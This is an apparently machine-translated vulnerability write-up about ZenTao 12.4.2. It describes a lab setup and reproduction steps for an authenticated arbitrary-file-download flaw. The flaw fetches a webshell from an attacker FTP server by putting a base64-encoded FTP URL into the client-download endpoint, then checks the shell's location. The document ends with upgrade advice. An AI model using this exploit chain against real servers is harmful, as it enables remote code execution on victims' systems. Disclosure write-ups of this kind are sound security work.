Shulou(Shulou.com)05/31 Report--

This article is to share with you about Zen 12.4.2 background administrator permissions Getshell is how, the editor feels very practical, so share with you to learn, I hope you can learn something after reading this article, say no more, follow the editor to have a look.

Introduction to 0x00

Zen Road is a professional domestic open source R & D project management software, which integrates product management, project management, quality management, document management, organization management and transaction management, and completely covers the core process of R & D project management. The management idea is based on the international popular agile project management method-Scrum. On the basis of following its values, combined with the current situation of domestic project research and development, the management idea integrates many functions such as task management, requirements management, Bug management, use case management and so on, covering the whole life cycle of the software from planning to release.

Overview of 0x01 vulnerabilities

There is an arbitrary file download vulnerability in version 12.4.2 of Zen Taoism, which is due to the lack of strict filtering in the download method in the client class. Ftp can be used to download files. And the download file storage directory can parse the php file, resulting in getshell.

0x02 affects version

Zen ≤ 12.4.2

0x03 environment building

Phpstudy2018 + Zen 12.4.2 official download address of Zen:

Https://www.zentao.net/dynamic/zentaopms12.4.2-80263.html

3.1. After the download is completed, you can install it in phpstudy.

3.2. Check the extension, and if there is a failed extension, open the extension in phpstudy.

3.3. Set the database information, which is set to your own database configuration.

3.4. Setting up account installation is complete

3.4. use the environment to build and enable the ftp service. Take windows2008R2 as an example, add roles and ftp.

3.5. Then add the ftp service to the website under Internet Information Services.

3.6. Configure according to your own situation, and you can take the next step.

3.7. Put a webshell in the ftp directory and then the browser checks to see if ftp can be accessed properly

Recurrence of 0x04 vulnerabilities

1. First, the path of ftp plus shell is encoded by base64.

Before encryption: ftp://192.168.3.200/shell.php

After encryption: ZnRwJTNBLy8xOTIuMTY4LjMuMjAwL3NoZWxsLnBocA==

two。 Using EXP, put the encrypted base64 in the exp

Http://127.0.0.1/zentaopms/www/index.php/client-download-1--1.html

3. Use the following link path to test if shell has been downloaded to the server

Http://192.168.3.200/zentaopms/www/data/client/1/shell.php

0x05 repair mode

1. Upgrade to Zen 12.4.3 and later

The above is what the background administrator Getshell of Zen 12.4.2 is like. The editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.